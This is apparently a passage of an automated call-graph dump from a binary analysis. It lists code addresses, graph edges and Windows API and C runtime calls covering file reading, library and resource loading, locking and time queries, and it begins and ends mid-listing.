48dd1 100843->100844 100849 48c59 100844->100849 100848 48dec 100848->100740 100850 48c73 _memset ___raise_securityfailure 100849->100850 100851 48c93 IsDebuggerPresent 100850->100851 100857 4a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 100851->100857 100854 48d57 ___raise_securityfailure 100858 4c5f6 100854->100858 100855 48d7a 100856 4a140 GetCurrentProcess TerminateProcess 100855->100856 100856->100848 100857->100854 100859 4c600 IsProcessorFeaturePresent 100858->100859 100860 4c5fe 100858->100860 100862 5590a 100859->100862 100860->100855 100865 558b9 5 API calls 2 library calls 100862->100865 100864 559ed 100864->100855 100865->100864 100867 4a4d4 EncodePointer 100866->100867 100867->100867 100868 4a4ee 100867->100868 100868->100744 100872 42c44 100869->100872 100871 42d4b 100871->100746 100873 42c50 __mtinitlocknum 100872->100873 100880 43217 100873->100880 100879 42c77 __mtinitlocknum 100879->100871 100881 49c0b __lock 58 API calls 100880->100881 100882 42c59 100881->100882 100883 42c88 DecodePointer DecodePointer 100882->100883 100884 42cb5 100883->100884 100885 42c65 100883->100885 100884->100885 100897 487a4 59 API calls 2 library calls 100884->100897 100894 42c82 100885->100894 100887 42d18 EncodePointer EncodePointer 100887->100885 100888 42cc7 100888->100887 100889 42cec 100888->100889 100898 48864 61 API calls __realloc_crt 100888->100898 100889->100885 100893 42d06 EncodePointer 100889->100893 100899 48864 61 API calls __realloc_crt 100889->100899 100892 42d00 100892->100885 100892->100893 100893->100887 100900 43220 100894->100900 100897->100888 100898->100889 100899->100892 100903 49d75 LeaveCriticalSection 100900->100903 100902 42c87 100902->100879 100903->100902 100905 49c0b __lock 58 API calls 100904->100905 100906 43377 DecodePointer EncodePointer 100905->100906 100969 49d75 LeaveCriticalSection 100906->100969 100908 24849 100909 433d4 100908->100909 100910 433de 100909->100910 100911 433f8 100909->100911 100910->100911 100970 48b28 58 API calls __getptd_noexit 100910->100970 100911->100753 100913 433e8 100971 48db6 9 API calls __Wcsftime_l 100913->100971 100915 433f3 100915->100753 100916->100755 100918 23b47 __ftell_nolock 100917->100918 100972 27667 100918->100972 100922 23b7a IsDebuggerPresent 100923 5d272 MessageBoxA 100922->100923 100924 23b88 100922->100924 100925 5d28c 100923->100925 100924->100925 100926 23ba5 100924->100926 100959 23c61 100924->100959 101176 27213 59 API calls Mailbox 100925->101176 101058 27285 100926->101058 100927 23c68 SetCurrentDirectoryW 100930 23c75 Mailbox 100927->100930 100930->100757 100931 5d29c 100936 5d2b2 SetCurrentDirectoryW 100931->100936 100933 23bc3 GetFullPathNameW 100934 27bcc 59 API calls 100933->100934 100935 23bfe 100934->100935 101074 3092d 100935->101074 100936->100930 100959->100927 100969->100908 100970->100913 100971->100915 100973 40db6 Mailbox 59 API calls 100972->100973 100974 27688 100973->100974 100975 40db6 Mailbox 59 API calls 100974->100975 100976 23b51 GetCurrentDirectoryW 100975->100976 100977 23766 100976->100977 100978 27667 59 API calls 100977->100978 100979 2377c 100978->100979 101189 23d31 100979->101189 100981 2379a 100982 24706 61 API calls 100981->100982 100983 237ae 100982->100983 100984 27de1 59 API calls 100983->100984 100985 237bb 100984->100985 101203 24ddd 100985->101203 100988 5d173 101270 8955b 100988->101270 100989 237dc Mailbox 100993 28047 59 API calls 100989->100993 100992 5d192 100995 42d55 _free 58 API calls 100992->100995 100996 237ef 100993->100996 100997 5d19f 100995->100997 101227 2928a 100996->101227 100999 24e4a 84 API calls 100997->100999 101002 5d1a8 100999->101002 101001 27de1 59 API calls 101003 23808 101001->101003 101005 23ed0 59 API calls 101002->101005 101230 284c0 101003->101230 101007 5d1c3 101005->101007 101006 2381a Mailbox 101008 27de1 59 API calls 101006->101008 101009 23ed0 59 API calls 101007->101009 101010 23840 101008->101010 101011 5d1df 101009->101011 101012 284c0 69 API calls 101010->101012 101013 24706 61 API calls 101011->101013 101015 2384f Mailbox 101012->101015 101014 5d204 101013->101014 101016 23ed0 59 API calls 101014->101016 101018 27667 59 API calls 101015->101018 101017 5d210 101016->101017 101019 28047 59 API calls 101017->101019 101020 2386d 101018->101020 101022 5d21e 101019->101022 101234 23ed0 101020->101234 101023 23ed0 59 API calls 101022->101023 101025 5d22d 101023->101025 101031 28047 59 API calls 101025->101031 101027 23887 101027->101002 101028 23891 101027->101028 101029 42efd _W_store_winword 60 API calls 101028->101029 101030 2389c 101029->101030 101030->101007 101032 238a6 101030->101032 101033 5d24f 101031->101033 101034 42efd _W_store_winword 60 API calls 101032->101034 101035 23ed0 59 API calls 101033->101035 101036 238b1 101034->101036 101037 5d25c 101035->101037 101036->101011 101038 238bb 101036->101038 101037->101037 101039 42efd _W_store_winword 60 API calls 101038->101039 101040 238c6 101039->101040 101040->101025 101041 23907 101040->101041 101043 23ed0 59 API calls 101040->101043 101041->101025 101042 23914 101041->101042 101250 292ce 101042->101250 101044 238ea 101043->101044 101046 28047 59 API calls 101044->101046 101048 238f8 101046->101048 101050 23ed0 59 API calls 101048->101050 101050->101041 101053 2928a 59 API calls 101055 2394f 101053->101055 101054 28ee0 60 API calls 101054->101055 101055->101053 101055->101054 101056 23ed0 59 API calls 101055->101056 101057 23995 Mailbox 101055->101057 101056->101055 101057->100922 101059 27292 __ftell_nolock 101058->101059 101060 5ea22 _memset 101059->101060 101061 272ab 101059->101061 101064 5ea3e GetOpenFileNameW 101060->101064 102135 24750 101061->102135 101065 5ea8d 101064->101065 101067 27bcc 59 API calls 101065->101067 101069 5eaa2 101067->101069 101069->101069 101071 272c9 102163 2686a 101071->102163 101075 3093a __ftell_nolock 101074->101075 102485 26d80 101075->102485 101077 3093f 101176->100931 101190 23d3e __ftell_nolock 101189->101190 101191 27bcc 59 API calls 101190->101191 101197 23ea4 Mailbox 101190->101197 101193 23d70 101191->101193 101202 23da6 Mailbox 101193->101202 101311 279f2 101193->101311 101194 279f2 59 API calls 101194->101202 101195 23e77 101196 27de1 59 API calls 101195->101196 101195->101197 101199 23e98 101196->101199 101197->100981 101198 27de1 59 API calls 101198->101202 101200 23f74 59 API calls 101199->101200 101200->101197 101202->101194 101202->101195 101202->101197 101202->101198 101314 23f74 101202->101314 101320 24bb5 101203->101320 101208 5d8e6 101211 24e4a 84 API calls 101208->101211 101209 24e08 LoadLibraryExW 101330 24b6a 101209->101330 101212 5d8ed 101211->101212 101214 24b6a 3 API calls 101212->101214 101216 5d8f5 101214->101216 101356 24f0b 101216->101356 101217 24e2f 101217->101216 101218 24e3b 101217->101218 101220 24e4a 84 API calls 101218->101220 101222 237d4 101220->101222 101222->100988 101222->100989 101224 5d91c 101364 24ec7 101224->101364 101226 5d929 101228 40db6 Mailbox 59 API calls 101227->101228 101229 237fb 101228->101229 101229->101001 101231 284cb 101230->101231 101233 284f2 101231->101233 101794 289b3 69 API calls Mailbox 101231->101794 101233->101006 101235 23ef3 101234->101235 101236 23eda 101234->101236 101237 27bcc 59 API calls 101235->101237 101238 28047 59 API calls 101236->101238 101239 23879 101237->101239 101238->101239 101240 42efd 101239->101240 101241 42f7e 101240->101241 101242 42f09 101240->101242 101797 42f90 60 API calls 4 library calls 101241->101797 101249 42f2e 101242->101249 101795 48b28 58 API calls __getptd_noexit 101242->101795 101245 42f8b 101245->101027 101246 42f15 101796 48db6 9 API calls __Wcsftime_l 101246->101796 101248 42f20 101248->101027 101249->101027 101251 292d6 101250->101251 101252 40db6 Mailbox 59 API calls 101251->101252 101253 292e4 101252->101253 101255 23924 101253->101255 101798 291fc 59 API calls Mailbox 101253->101798 101256 29050 101255->101256 101799 29160 101256->101799 101258 40db6 Mailbox 59 API calls 101260 23932 101258->101260 101259 2905f 101259->101258 101259->101260 101261 28ee0 101260->101261 101262 5f17c 101261->101262 101265 28ef7 101261->101265 101262->101265 101809 28bdb 59 API calls Mailbox 101262->101809 101264 28fff 101264->101055 101265->101264 101266 29040 101265->101266 101267 28ff8 101265->101267 101808 29d3c 60 API calls Mailbox 101266->101808 101269 40db6 Mailbox 59 API calls 101267->101269 101269->101264 101271 24ee5 85 API calls 101270->101271 101272 895ca 101271->101272 101810 89734 101272->101810 101275 5d186 101275->100992 101305 24e4a 101275->101305 101276 24f0b 74 API calls 101277 895f7 101276->101277 101278 24f0b 74 API calls 101277->101278 101279 89607 101278->101279 101280 24f0b 74 API calls 101279->101280 101281 89622 101280->101281 101282 24f0b 74 API calls 101281->101282 101283 8963d 101282->101283 101284 24ee5 85 API calls 101283->101284 101285 89654 101284->101285 101286 4571c __crtLCMapStringA_stat 58 API calls 101285->101286 101287 8965b 101286->101287 101288 4571c __crtLCMapStringA_stat 58 API calls 101287->101288 101289 89665 101288->101289 101290 24f0b 74 API calls 101289->101290 101291 89679 101290->101291 101292 89109 GetSystemTimeAsFileTime 101291->101292 101293 8968c 101292->101293 101294 896a1 101293->101294 101295 896b6 101293->101295 101296 42d55 _free 58 API calls 101294->101296 101297 8971b 101295->101297 101298 896bc 101295->101298 101299 896a7 101296->101299 101301 42d55 _free 58 API calls 101297->101301 101816 88b06 101298->101816 101302 42d55 _free 58 API calls 101299->101302 101301->101275 101302->101275 101304 42d55 _free 58 API calls 101304->101275 101306 24e54 101305->101306 101307 24e5b 101305->101307 101308 453a6 __fcloseall 83 API calls 101306->101308 101309 24e6a 101307->101309 101310 24e7b FreeLibrary 101307->101310 101308->101307 101309->100992 101310->101309 101312 27e4f 59 API calls 101311->101312 101313 279fd 101312->101313 101313->101193 101315 23f82 101314->101315 101316 23fa4 _memmove 101314->101316 101319 40db6 Mailbox 59 API calls 101315->101319 101317 40db6 Mailbox 59 API calls 101316->101317 101318 23fb8 101317->101318 101318->101202 101319->101316 101369 24c03 101320->101369 101323 24bdc 101325 24bf5 101323->101325 101326 24bec FreeLibrary 101323->101326 101324 24c03 2 API calls 101324->101323 101327 4525b 101325->101327 101326->101325 101373 45270 101327->101373 101329 24dfc 101329->101208 101329->101209 101531 24c36 101330->101531 101333 24c36 2 API calls 101336 24b8f 101333->101336 101334 24ba1 FreeLibrary 101335 24baa 101334->101335 101337 24c70 101335->101337 101336->101334 101336->101335 101338 40db6 Mailbox 59 API calls 101337->101338 101339 24c85 101338->101339 101535 2522e 101339->101535 101341 24c91 _memmove 101342 24ccc 101341->101342 101344 24dc1 101341->101344 101345 24d89 101341->101345 101343 24ec7 69 API calls 101342->101343 101351 24cd5 101343->101351 101549 8991b 95 API calls 101344->101549 101538 24e89 CreateStreamOnHGlobal 101345->101538 101348 24f0b 74 API calls 101348->101351 101350 24d69 101350->101217 101351->101348 101351->101350 101352 5d8a7 101351->101352 101544 24ee5 101351->101544 101353 24ee5 85 API calls 101352->101353 101354 5d8bb 101353->101354 101355 24f0b 74 API calls 101354->101355 101355->101350 101357 24f1d 101356->101357 101360 5d9cd 101356->101360 101573 455e2 101357->101573 101361 89109 101771 88f5f 101361->101771 101363 8911f 101363->101224 101365 24ed6 101364->101365 101366 5d990 101364->101366 101776 45c60 101365->101776 101368 24ede 101368->101226 101370 24bd0 101369->101370 101371 24c0c LoadLibraryA 101369->101371 101370->101323 101370->101324 101371->101370 101372 24c1d GetProcAddress 101371->101372 101372->101370 101376 4527c __mtinitlocknum 101373->101376 101374 4528f 101422 48b28 58 API calls __getptd_noexit 101374->101422 101376->101374 101378 452c0 101376->101378 101377 45294 101423 48db6 9 API calls __Wcsftime_l 101377->101423 101392 504e8 101378->101392 101381 452c5 101382 452ce 101381->101382 101383 452db 101381->101383 101424 48b28 58 API calls __getptd_noexit 101382->101424 101384 45305 101383->101384 101385 452e5 101383->101385 101407 50607 101384->101407 101425 48b28 58 API calls __getptd_noexit 101385->101425 101389 4529f __mtinitlocknum @_EH4_CallFilterFunc@8 101389->101329 101393 504f4 __mtinitlocknum 101392->101393 101394 49c0b __lock 58 API calls 101393->101394 101405 50502 101394->101405 101395 50576 101427 505fe 101395->101427 101396 5057d 101432 4881d 58 API calls 2 library calls 101396->101432 101399 505f3 __mtinitlocknum 101399->101381 101400 50584 101400->101395 101433 49e2b InitializeCriticalSectionAndSpinCount 101400->101433 101403 49c93 __mtinitlocknum 58 API calls 101403->101405 101404 505aa EnterCriticalSection 101404->101395 101405->101395 101405->101396 101405->101403 101430 46c50 59 API calls __lock 101405->101430 101431 46cba LeaveCriticalSection LeaveCriticalSection _doexit 101405->101431 101416 50627 __wopenfile 101407->101416 101408 50641 101438 48b28 58 API calls __getptd_noexit 101408->101438 101410 507fc 101410->101408 101414 5085f 101410->101414 101411 50646 101439 48db6 9 API calls __Wcsftime_l 101411->101439 101413 45310 101426 45332 LeaveCriticalSection LeaveCriticalSection _fseek 101413->101426 101435 585a1 101414->101435 101416->101408 101416->101410 101440 437cb 60 API calls 3 library calls 101416->101440 101418 507f5 101418->101410 101441 437cb 60 API calls 3 library calls 101418->101441 101420 50814 101420->101410 101442 437cb 60 API calls 3 library calls 101420->101442 101422->101377 101423->101389 101424->101389 101425->101389 101426->101389 101434 49d75 LeaveCriticalSection 101427->101434 101429 50605 101429->101399 101430->101405 101431->101405 101432->101400 101433->101404 101434->101429 101443 57d85 101435->101443 101437 585ba 101437->101413 101438->101411 101439->101413 101440->101418 101441->101420 101442->101410 101446 57d91 __mtinitlocknum 101443->101446 101444 57da7 101528 48b28 58 API calls __getptd_noexit 101444->101528 101446->101444 101448 57ddd 101446->101448 101447 57dac 101529 48db6 9 API calls __Wcsftime_l 101447->101529 101454 57e4e 101448->101454 101451 57df9 101530 57e22 LeaveCriticalSection __unlock_fhandle 101451->101530 101453 57db6 __mtinitlocknum 101453->101437 101455 57e6e 101454->101455 101456 444ea __wsopen_nolock 58 API calls 101455->101456 101459 57e8a 101456->101459 101457 48dc6 __invoke_watson 8 API calls 101458 585a0 101457->101458 101460 57d85 __wsopen_helper 103 API calls 101458->101460 101461 57ec4 101459->101461 101468 57ee7 101459->101468 101502 57fc1 101459->101502 101462 585ba 101460->101462 101463 48af4 __close 58 API calls 101461->101463 101462->101451 101464 57ec9 101463->101464 101465 48b28 __mtinitlocknum 58 API calls 101464->101465 101466 57ed6 101465->101466 101469 48db6 __Wcsftime_l 9 API calls 101466->101469 101467 57fa5 101470 48af4 __close 58 API calls 101467->101470 101468->101467 101475 57f83 101468->101475 101471 57ee0 101469->101471 101472 57faa 101470->101472 101471->101451 101473 48b28 __mtinitlocknum 58 API calls 101472->101473 101474 57fb7 101473->101474 101476 48db6 __Wcsftime_l 9 API calls 101474->101476 101477 4d294 __alloc_osfhnd 61 API calls 101475->101477 101476->101502 101478 58051 101477->101478 101479 5807e 101478->101479 101480 5805b 101478->101480 101481 57cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101479->101481 101482 48af4 __close 58 API calls 101480->101482 101492 580a0 101481->101492 101483 58060 101482->101483 101484 48b28 __mtinitlocknum 58 API calls 101483->101484 101486 5806a 101484->101486 101485 5811e GetFileType 101487 58129 GetLastError 101485->101487 101488 5816b 101485->101488 101490 48b28 __mtinitlocknum 58 API calls 101486->101490 101491 48b07 __dosmaperr 58 API calls 101487->101491 101499 4d52a __set_osfhnd 59 API calls 101488->101499 101489 580ec GetLastError 101493 48b07 __dosmaperr 58 API calls 101489->101493 101490->101471 101494 58150 CloseHandle 101491->101494 101492->101485 101492->101489 101495 57cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101492->101495 101496 58111 101493->101496 101494->101496 101497 5815e 101494->101497 101498 580e1 101495->101498 101500 48b28 __mtinitlocknum 58 API calls 101496->101500 101501 48b28 __mtinitlocknum 58 API calls 101497->101501 101498->101485 101498->101489 101505 58189 101499->101505 101500->101502 101503 58163 101501->101503 101502->101457 101503->101496 101504 58344 101504->101502 101507 58517 CloseHandle 101504->101507 101505->101504 101506 518c1 __lseeki64_nolock 60 API calls 101505->101506 101525 5820a 101505->101525 101508 581f3 101506->101508 101509 57cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101507->101509 101511 48af4 __close 58 API calls 101508->101511 101508->101525 101510 5853e 101509->101510 101512 58546 GetLastError 101510->101512 101513 58572 101510->101513 101511->101525 101514 48b07 __dosmaperr 58 API calls 101512->101514 101513->101502 101516 58552 101514->101516 101515 5823c 101519 597a2 __chsize_nolock 82 API calls 101515->101519 101515->101525 101520 4d43d __free_osfhnd 59 API calls 101516->101520 101517 50add __close_nolock 61 API calls 101517->101525 101518 50e5b 70 API calls __read_nolock 101518->101525 101519->101515 101520->101513 101521 4d886 __write 78 API calls 101521->101525 101522 583c1 101524 50add __close_nolock 61 API calls 101522->101524 101523 518c1 60 API calls __lseeki64_nolock 101523->101525 101526 583c8 101524->101526 101525->101504 101525->101515 101525->101517 101525->101518 101525->101521 101525->101522 101525->101523 101527 48b28 __mtinitlocknum 58 API calls 101526->101527 101527->101502 101528->101447 101529->101453 101530->101453 101532 24b83 101531->101532 101533 24c3f LoadLibraryA 101531->101533 101532->101333 101532->101336 101533->101532 101534 24c50 GetProcAddress 101533->101534 101534->101532 101536 40db6 Mailbox 59 API calls 101535->101536 101537 25240 101536->101537 101537->101341 101539 24ea3 FindResourceExW 101538->101539 101543 24ec0 101538->101543 101540 5d933 LoadResource 101539->101540 101539->101543 101541 5d948 SizeofResource 101540->101541 101540->101543 101542 5d95c LockResource 101541->101542 101541->101543 101542->101543 101543->101342 101545 24ef4 101544->101545 101546 5d9ab 101544->101546 101550 4584d 101545->101550 101548 24f02 101548->101351 101549->101342 101551 45859 __mtinitlocknum 101550->101551 101552 4586b 101551->101552 101554 45891 101551->101554 101563 48b28 58 API calls __getptd_noexit 101552->101563 101565 46c11 101554->101565 101555 45870 101564 48db6 9 API calls __Wcsftime_l 101555->101564 101558 45897 101571 457be 83 API calls 5 library calls 101558->101571 101560 458a6 101572 458c8 LeaveCriticalSection LeaveCriticalSection _fseek 101560->101572 101562 4587b __mtinitlocknum 101562->101548 101563->101555 101564->101562 101566 46c21 101565->101566 101567 46c43 EnterCriticalSection 101565->101567 101566->101567 101568 46c29 101566->101568 101570 46c39 101567->101570 101569 49c0b __lock 58 API calls 101568->101569 101569->101570 101570->101558 101571->101560 101572->101562 101576 455fd 101573->101576 101575 24f2e 101575->101361 101577 45609 __mtinitlocknum 101576->101577 101578 4564c 101577->101578 101579 4561f _memset 101577->101579 101580 45644 __mtinitlocknum 101577->101580 101581 46c11 __lock_file 59 API calls 101578->101581 101603 48b28 58 API calls __getptd_noexit 101579->101603 101580->101575 101583 45652 101581->101583 101589 4541d 101583->101589 101584 45639 101604 48db6 9 API calls __Wcsftime_l 101584->101604 101590 45453 101589->101590 101594 45438 _memset 101589->101594 101605 45686 LeaveCriticalSection LeaveCriticalSection _fseek 101590->101605 101591 45443 101701 48b28 58 API calls __getptd_noexit 101591->101701 101593 45448 101702 48db6 9 API calls __Wcsftime_l 101593->101702 101594->101590 101594->101591 101601 45493 101594->101601 101597 455a4 _memset 101704 48b28 58 API calls __getptd_noexit 101597->101704 101601->101590 101601->101597 101606 446e6 101601->101606 101613 50e5b 101601->101613 101681 50ba7 101601->101681 101703 50cc8 58 API calls 4 library calls 101601->101703 101603->101584 101604->101580 101605->101580 101607 44705 101606->101607 101608 446f0 101606->101608 101607->101601 101705 48b28 58 API calls __getptd_noexit 101608->101705 101610 446f5 101706 48db6 9 API calls __Wcsftime_l 101610->101706 101612 44700 101612->101601 101614 50e93 101613->101614 101615 50e7c 101613->101615 101616 515cb 101614->101616 101621 50ecd 101614->101621 101716 48af4 58 API calls __getptd_noexit 101615->101716 101732 48af4 58 API calls __getptd_noexit 101616->101732 101619 50e81 101717 48b28 58 API calls __getptd_noexit 101619->101717 101623 50ed5 101621->101623 101631 50eec 101621->101631 101622 515d0 101733 48b28 58 API calls __getptd_noexit 101622->101733 101718 48af4 58 API calls __getptd_noexit 101623->101718 101626 50ee1 101734 48db6 9 API calls __Wcsftime_l 101626->101734 101627 50e88 101627->101601 101628 50eda 101719 48b28 58 API calls __getptd_noexit 101628->101719 101630 50f01 101720 48af4 58 API calls __getptd_noexit 101630->101720 101631->101627 101631->101630 101633 50f1b 101631->101633 101636 50f39 101631->101636 101633->101630 101635 50f26 101633->101635 101707 55c6b 101635->101707 101721 4881d 58 API calls 2 library calls 101636->101721 101639 50f49 101641 50f51 101639->101641 101642 50f6c 101639->101642 101640 5103a 101643 510b3 ReadFile 101640->101643 101646 51050 GetConsoleMode 101640->101646 101722 48b28 58 API calls __getptd_noexit 101641->101722 101724 518c1 60 API calls 3 library calls 101642->101724 101647 510d5 101643->101647 101648 51593 GetLastError 101643->101648 101653 51064 101646->101653 101654 510b0 101646->101654 101647->101648 101655 510a5 101647->101655 101650 51093 101648->101650 101651 515a0 101648->101651 101649 50f56 101723 48af4 58 API calls __getptd_noexit 101649->101723 101664 51099 101650->101664 101725 48b07 58 API calls 3 library calls 101650->101725 101730 48b28 58 API calls __getptd_noexit 101651->101730 101653->101654 101657 5106a ReadConsoleW 101653->101657 101654->101643 101663 5110a 101655->101663 101655->101664 101670 51377 101655->101670 101657->101655 101659 5108d GetLastError 101657->101659 101658 515a5 101731 48af4 58 API calls __getptd_noexit 101658->101731 101659->101650 101662 42d55 _free 58 API calls 101662->101627 101666 51176 ReadFile 101663->101666 101674 511f7 101663->101674 101664->101627 101664->101662 101667 51197 GetLastError 101666->101667 101680 511a1 101666->101680 101667->101680 101668 512b4 101675 51264 MultiByteToWideChar 101668->101675 101728 518c1 60 API calls 3 library calls 101668->101728 101669 512a4 101727 48b28 58 API calls __getptd_noexit 101669->101727 101670->101664 101671 5147d ReadFile 101670->101671 101673 514a0 GetLastError 101671->101673 101679 514ae 101671->101679 101673->101679 101674->101664 101674->101668 101674->101669 101674->101675 101675->101659 101675->101664 101679->101670 101729 518c1 60 API calls 3 library calls 101679->101729 101680->101663 101726 518c1 60 API calls 3 library calls 101680->101726 101682 50bb2 101681->101682 101685 50bc7 101681->101685 101768 48b28 58 API calls __getptd_noexit 101682->101768 101684 50bb7 101769 48db6 9 API calls __Wcsftime_l 101684->101769 101687 50bfc 101685->101687 101695 50bc2 101685->101695 101770 55fe4 58 API calls __malloc_crt 101685->101770 101689 446e6 __fseek_nolock 58 API calls 101687->101689 101690 50c10 101689->101690 101735 50d47 101690->101735 101692 50c17 101693 446e6 __fseek_nolock 58 API calls 101692->101693 101692->101695 101694 50c3a 101693->101694 101694->101695 101696 446e6 __fseek_nolock 58 API calls 101694->101696 101695->101601 101697 50c46 101696->101697 101697->101695 101698 446e6 __fseek_nolock 58 API calls 101697->101698 101699 50c53 101698->101699 101700 446e6 __fseek_nolock 58 API calls 101699->101700 101700->101695 101701->101593 101702->101590 101703->101601 101704->101593 101705->101610 101706->101612 101708 55c76 101707->101708 101709 55c83 101707->101709 101710 48b28 __mtinitlocknum 58 API calls 101708->101710 101712 55c8f 101709->101712 101713 48b28 __mtinitlocknum 58 API calls 101709->101713 101711 55c7b 101710->101711 101711->101640 101712->101640 101714 55cb0 101713->101714 101715 48db6 __Wcsftime_l 9 API calls 101714->101715 101715->101711 101716->101619 101717->101627 101718->101628 101719->101626 101720->101628 101721->101639 101722->101649 101723->101627 101724->101635 101725->101664 101726->101680 101727->101664 101728->101675 101729->101679 101730->101658 101731->101664 101732->101622 101733->101626 101734->101627 101736 50d53 __mtinitlocknum 101735->101736 101737 50d77 101736->101737 101738 50d60 101736->101738 101739 50e3b 101737->101739 101741 50d8b 101737->101741 101740 48af4 __close 58 API calls 101738->101740 101742 48af4 __close 58 API calls 101739->101742 101743 50d65 101740->101743 101744 50db6 101741->101744 101745 50da9 101741->101745 101746 50dae 101742->101746 101747 48b28 __mtinitlocknum 58 API calls 101743->101747 101749 50dc3 101744->101749 101750 50dd8 101744->101750 101748 48af4 __close 58 API calls 101745->101748 101754 48b28 __mtinitlocknum 58 API calls 101746->101754 101751 50d6c __mtinitlocknum 101747->101751 101748->101746 101752 48af4 __close 58 API calls 101749->101752 101753 4d206 ___lock_fhandle 59 API calls 101750->101753 101751->101692 101755 50dc8 101752->101755 101756 50dde 101753->101756 101763 50dd0 101754->101763 101757 48b28 __mtinitlocknum 58 API calls 101755->101757 101758 50e04 101756->101758 101759 50df1 101756->101759 101757->101763 101762 48b28 __mtinitlocknum 58 API calls 101758->101762 101760 50e5b __read_nolock 70 API calls 101759->101760 101764 50dfd 101760->101764 101761 48db6 __Wcsftime_l 9 API calls 101761->101751 101765 50e09 101762->101765 101763->101761 101767 50e33 __read LeaveCriticalSection 101764->101767 101766 48af4 __close 58 API calls 101765->101766 101766->101764 101767->101751 101768->101684 101769->101695 101770->101687 101774 4520a GetSystemTimeAsFileTime 101771->101774 101773 88f6e 101773->101363 101775 45238 __aulldiv 101774->101775 101775->101773 101777 45c6c __mtinitlocknum 101776->101777 101778 45c93 101777->101778 101779 45c7e 101777->101779 101781 46c11 __lock_file 59 API calls 101778->101781 101790 48b28 58 API calls __getptd_noexit 101779->101790 101783 45c99 101781->101783 101782 45c83 101791 48db6 9 API calls __Wcsftime_l 101782->101791 101792 458d0 67 API calls 7 library calls 101783->101792 101786 45ca4 101793 45cc4 LeaveCriticalSection LeaveCriticalSection _fseek 101786->101793 101788 45cb6 101789 45c8e __mtinitlocknum 101788->101789 101789->101368 101790->101782 101791->101789 101792->101786 101793->101788 101794->101233 101795->101246 101796->101248 101797->101245 101798->101255 101800 29169 Mailbox 101799->101800 101801 5f19f 101800->101801 101806 29173 101800->101806 101803 40db6 Mailbox 59 API calls 101801->101803 101802 2917a 101802->101259 101804 5f1ab 101803->101804 101806->101802 101807 29c90 59 API calls Mailbox 101806->101807 101807->101806 101808->101264 101809->101265 101813 89748 __tzset_nolock _wcscmp 101810->101813 101811 89109 GetSystemTimeAsFileTime 101811->101813 101812 895dc 101812->101275 101812->101276 101813->101811 101813->101812 101814 24f0b 74 API calls 101813->101814 101815 24ee5 85 API calls 101813->101815 101814->101813 101815->101813 101817 88b1f 101816->101817 101818 88b11 101816->101818 101820 88b64 101817->101820 101821 4525b 115 API calls 101817->101821 101846 88b28 101817->101846 101819 4525b 115 API calls 101818->101819 101819->101817 101847 88d91 101820->101847 101823 88b49 101821->101823 101823->101820 101825 88b52 101823->101825 101824 88ba8 101826 88bac 101824->101826 101827 88bcd 101824->101827 101829 453a6 __fcloseall 83 API calls 101825->101829 101825->101846 101831 453a6 __fcloseall 83 API calls 101826->101831 101832 88bb9 101826->101832 101851 889a9 101827->101851 101829->101846 101831->101832 101835 453a6 __fcloseall 83 API calls 101832->101835 101832->101846 101833 88bfb 101860 88c2b 101833->101860 101834 88bdb 101836 88be8 101834->101836 101838 453a6 __fcloseall 83 API calls 101834->101838 101835->101846 101840 453a6 __fcloseall 83 API calls 101836->101840 101836->101846 101838->101836 101840->101846 101843 88c16 101845 453a6 __fcloseall 83 API calls 101843->101845 101843->101846 101845->101846 101846->101304 101848 88db6 101847->101848 101850 88d9f __tzset_nolock _memmove 101847->101850 101849 455e2 __fread_nolock 74 API calls 101848->101849 101849->101850 101850->101824 101852 4571c __crtLCMapStringA_stat 58 API calls 101851->101852 101853 889b8 101852->101853 101854 4571c __crtLCMapStringA_stat 58 API calls 101853->101854 101855 889cc 101854->101855 101856 4571c __crtLCMapStringA_stat 58 API calls 101855->101856 101857 889e0 101856->101857 101858 88d0d 58 API calls 101857->101858 101859 889f3 101857->101859 101858->101859 101859->101833 101859->101834 101867 88c40 101860->101867 101861 88cf8 101893 88f35 101861->101893 101863 88c02 101868 88d0d 101863->101868 101864 88a05 74 API calls 101864->101867 101867->101861 101867->101863 101867->101864 101889 88e12 101867->101889 101897 88aa1 74 API calls 101867->101897 101869 88d1a 101868->101869 101870 88d20 101868->101870 101871 42d55 _free 58 API calls 101869->101871 101872 88d31 101870->101872 101873 42d55 _free 58 API calls 101870->101873 101871->101870 101874 42d55 _free 58 API calls 101872->101874 101875 88c09 101872->101875 101873->101872 101874->101875 101875->101843 101876 453a6 101875->101876 101877 453b2 __mtinitlocknum 101876->101877 101878 453c6 101877->101878 101879 453de 101877->101879 101946 48b28 58 API calls __getptd_noexit 101878->101946 101881 46c11 __lock_file 59 API calls 101879->101881 101885 453d6 __mtinitlocknum 101879->101885 101883 453f0 101881->101883 101882 453cb 101947 48db6 9 API calls __Wcsftime_l 101882->101947 101930 4533a 101883->101930 101885->101843 101891 88e21 101889->101891 101892 88e61 101889->101892 101891->101867 101892->101891 101898 88ee8 101892->101898 101894 88f53 101893->101894 101895 88f42 101893->101895 101894->101863 101896 44863 80 API calls 101895->101896 101896->101894 101897->101867 101899 88f25 101898->101899 101900 88f14 101898->101900 101899->101892 101902 44863 101900->101902 101903 4486f __mtinitlocknum 101902->101903 101904 448a5 101903->101904 101905 4488d 101903->101905 101914 4489d __mtinitlocknum 101903->101914 101906 46c11 __lock_file 59 API calls 101904->101906 101927 48b28 58 API calls __getptd_noexit 101905->101927 101908 448ab 101906->101908 101915 4470a 101908->101915 101909 44892 101928 48db6 9 API calls __Wcsftime_l 101909->101928 101914->101899 101918 44719 101915->101918 101923 44737 101915->101923 101916 44727 101917 48b28 __mtinitlocknum 58 API calls 101916->101917 101919 4472c 101917->101919 101918->101916 101920 44751 _memmove 101918->101920 101918->101923 101921 48db6 __Wcsftime_l 9 API calls 101919->101921 101922 4ae1e __flsbuf 78 API calls 101920->101922 101920->101923 101924 44a3d __flush 78 API calls 101920->101924 101925 446e6 __fseek_nolock 58 API calls 101920->101925 101926 4d886 __write 78 API calls 101920->101926 101921->101923 101922->101920 101929 448dd LeaveCriticalSection LeaveCriticalSection _fseek 101923->101929 101924->101920 101925->101920 101926->101920 101927->101909 101928->101914 101929->101914 101931 4535d 101930->101931 101932 45349 101930->101932 101938 45359 101931->101938 101949 44a3d 101931->101949 101985 48b28 58 API calls __getptd_noexit 101932->101985 101934 4534e 101986 48db6 9 API calls __Wcsftime_l 101934->101986 101948 45415 LeaveCriticalSection LeaveCriticalSection _fseek 101938->101948 101941 446e6 